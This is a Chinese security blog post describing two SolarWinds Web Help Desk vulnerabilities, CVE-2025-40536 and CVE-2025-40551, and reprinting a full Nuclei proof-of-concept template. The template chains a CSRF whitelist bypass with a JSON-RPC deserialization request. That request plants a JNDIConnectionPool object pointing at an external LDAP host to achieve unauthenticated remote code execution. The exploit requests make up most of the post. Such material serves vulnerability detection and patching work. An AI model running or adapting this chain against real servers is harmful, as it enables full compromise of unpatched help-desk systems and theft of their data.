CVE-2025-40536&CVE-2025-40551｜SolarWinds Web Help Desk未授权远程代码执行漏洞（POC）

信安百科

发布于 2026-03-03 10:20:07

200

文章被收录于专栏：信安百科信安百科

0x00 前言

Web Help Desk（WHD）是基于ITIL的标准和规范的服务与流程管理系统。WHD提供了丰富的功能集，来解决关键的IT和技术支持问题，包括：事件管理、问题管理、变更管理、资产和配置管理、知识管理。

SolarWinds的WHD（服务于流程管理系统）采用B/S架构，通过PC终端或者移动平台来访问Web页面，提交服务请求，生成工单，及和工单的整个生命周期关联的事件管理、问题管理、变更管理、资产和配置管理、知识管理。

0x01 漏洞描述

CVE-2025-40536 漏洞源于WHD对Java WebObjects框架处理不当。通过在URL中构造包含badparam=/ajax/的恶意查询参数，绕过系统的CSRF白名单校验，从而在未授权的情况下动态实例化LoginPref等后端组件。 CVE-2025-40551 针对AjaxProxy功能发送特制的JSON-RPC请求。通过将请求路径中的 /ajax/伪装为/wo/，攻击者可以轻易绕过厂商之前的补丁清理逻辑，注入恶意的Java对象（如利用JNDIConnectionPool或SQLite JDBC驱动机制）。 —— ——来源于网络

0x02 CVE编号

CVE-2025-40536

CVE-2025-40551

0x03 影响版本

SolarWinds Web Help Desk 2026.1之前的所有版本

0x04 漏洞详情

POC：

https://cloud.projectdiscovery.io/library/CVE-2025-40551

id: CVE-2025-40551

info:
  name: SolarWinds Web Help Desk < 2026.1 - Unauthenticated JNDI Injection RCE
  author: Horizon3.ai
  severity: critical
  description: |
    SolarWinds Web Help Desk before version 2026.1 contains an insecure deserialization vulnerability in the jabsorb JSON-RPC library. When chained with a CSRF whitelist bypass (CVE-2025-40536), remote unauthenticated attackers can exploit JNDI injection via the Apache Xalan JNDIConnectionPool class to achieve remote code execution. The bypass involves including "/ajax/" in a query parameter to circumvent URI validation, while switching from "/ajax/" to "/wo/" endpoints bypasses payload sanitization routines.
  impact: |
    Remote attackers can execute arbitrary code on the host machine without authentication, potentially leading to full system compromise.
  remediation: |
    Update SolarWinds Web Help Desk to version 2026.1 or later.
  reference:
    - https://horizon3.ai/attack-research/cve-2025-40551-another-solarwinds-web-help-desk-deserialization-issue/
    - https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40551
    - https://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htm
    - https://nvd.nist.gov/vuln/detail/CVE-2025-40551
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-40551
    cwe-id: CWE-502
    epss-score: 0.79316
    epss-percentile: 0.9904
  metadata:
    verified: true
    max-request: 6
    vendor: solarwinds
    product: web_help_desk
    shodan-query: http.favicon.hash:1895809524
  tags: cve,cve2025,solarwinds,webhelpdesk,deserialization,rce,jndi,oast,kev,vkev

flow: |
  http("initial_session") &&
  http("login_pref_page") &&
  http("trigger_saml_object") &&
  http("create_jsonrpc_bridge") &&
  http("create_malicious_object") &&
  http("trigger_jndi_lookup")

http:
  - id: initial_session
    method: GET
    path:
      - "{{BaseURL}}/helpdesk/WebObjects/Helpdesk.woa"
    headers:
      x-webobjects-recording: 1

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains(tolower(all_headers), "x-webobjects-session-id")
          - contains(tolower(all_headers), "xsrf-token")
          - contains(toupper(all_headers), "JSESSIONID")
        internal: true
        condition: and

      - type: status
        status:
          - 200
        internal: true

    extractors:
      - type: regex
        name: wosid
        part: header
        regex:
          - "[xX]-[W]ebobjects-[sS]ession-[iI]d: ([a-zA-Z0-9]{22})"
        group: 1
        internal: true

      - type: regex
        name: xsrf_token
        part: header
        group: 1
        regex:
          - "Set-Cookie: XSRF-TOKEN=([a-z0-9-]{36});"
        internal: true

  - id: login_pref_page
    method: GET
    path:
      - "{{BaseURL}}/helpdesk/WebObjects/Helpdesk.woa/wo/bogus.wo/{{wosid}}/1.0?badparam=/ajax/&wopage=LoginPref"
    headers:
      X-Xsrf-Token: "{{xsrf_token}}"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - externalAuthContainer
          - SAML 2.0
        internal: true
        condition: and

      - type: status
        status:
          - 200
        internal: true

    extractors:
      - type: regex
        name: externalAuthContainer
        part: body
        group: 1
        regex:
          - 'id="externalAuthContainer" updateUrl="/(helpdesk/WebObjects/Helpdesk.woa/ajax/[0-9]+\.[0-9]+)'
        internal: true

  - id: trigger_saml_object
    method: POST
    path:
      - "{{BaseURL}}/{{externalAuthContainer}}"
    headers:
      X-Xsrf-Token: "{{xsrf_token}}"
    body: 0.7.1.3.1.0.0.0.1.1.0=1&_csrf={{xsrf_token}}

    matchers:
      - type: status
        status:
          - 200
        internal: true

  - id: create_jsonrpc_bridge
    method: GET
    path:
      - "{{BaseURL}}/helpdesk/WebObjects/Helpdesk.woa/wo/bogus.wo/{{wosid}}/1.0?badparam=/ajax/&wopage=LoginPref"
    headers:
      X-Xsrf-Token: "{{xsrf_token}}"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - JSONRpcClient
        internal: true

      - type: status
        status:
          - 200
        internal: true

    extractors:
      - type: regex
        name: jsonrpc_endpoint
        part: body
        group: 1
        regex:
          - "JSONRpcClient\\('/helpdesk/WebObjects/Helpdesk.woa/ajax/([0-9.]+)'\\);"
        internal: true

  - id: create_malicious_object
    method: POST
    path:
      - "{{BaseURL}}/helpdesk/WebObjects/Helpdesk.woa/wo/{{jsonrpc_endpoint}}"
    headers:
      X-Xsrf-Token: "{{xsrf_token}}"
      Content-Type: application/json
    body: |
      {
        "bypass":"java.parentpopupwonoselectionstringdummymdssubmitlinkmdsform__enterkeypressedmdsform__shiftkeypressedmdsform__altkeypressed_csrf",
        "id":1,
        "method":"wopage.setVariableValueForName",
        "params":[
          "malicious",
          {
            "javaClass":"org.apache.xalan.lib.sql.JNDIConnectionPool",
            "jndiPath":"ldap://{{interactsh-url}}/ou=ou,o=o"
          }
        ]
      }

    matchers:
      - type: status
        status:
          - 200
        internal: true

  - id: trigger_jndi_lookup
    method: POST
    path:
      - "{{BaseURL}}/helpdesk/WebObjects/Helpdesk.woa/wo/{{jsonrpc_endpoint}}"
    headers:
      X-Xsrf-Token: "{{xsrf_token}}"
      Content-Type: application/json
    body: |
      {
        "bypass":"java.parentpopupwonoselectionstringdummymdssubmitlinkmdsform__enterkeypressedmdsform__shiftkeypressedmdsform__altkeypressed_csrf",
        "id":1,
        "method":"wopage.variableValueForName",
        "params":["malicious"]
      }

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: status
        status:
          - 200
# digest: 490a0046304402204b0a6bc483452e1ee2b308094a593bec3a0ae5d5942c1734e418d4e1c4f7204602200a5ea4296b6063f62cb9005cc5486473e379e8766062f65d511c28874abd5599:922c64590222798bb761d5b6d8e72950

0x05 参考链接

https://www.solarwinds.com/trust-center/security-advisories/cve-2025-40551

https://www.solarwinds.com/trust-center/security-advisories/cve-2025-40536

Ps：国内外安全热点分享，欢迎大家分享、转载，请保证文章的完整性。文章中出现敏感信息和侵权内容，请联系作者删除信息。信息安全任重道远，感谢您的支持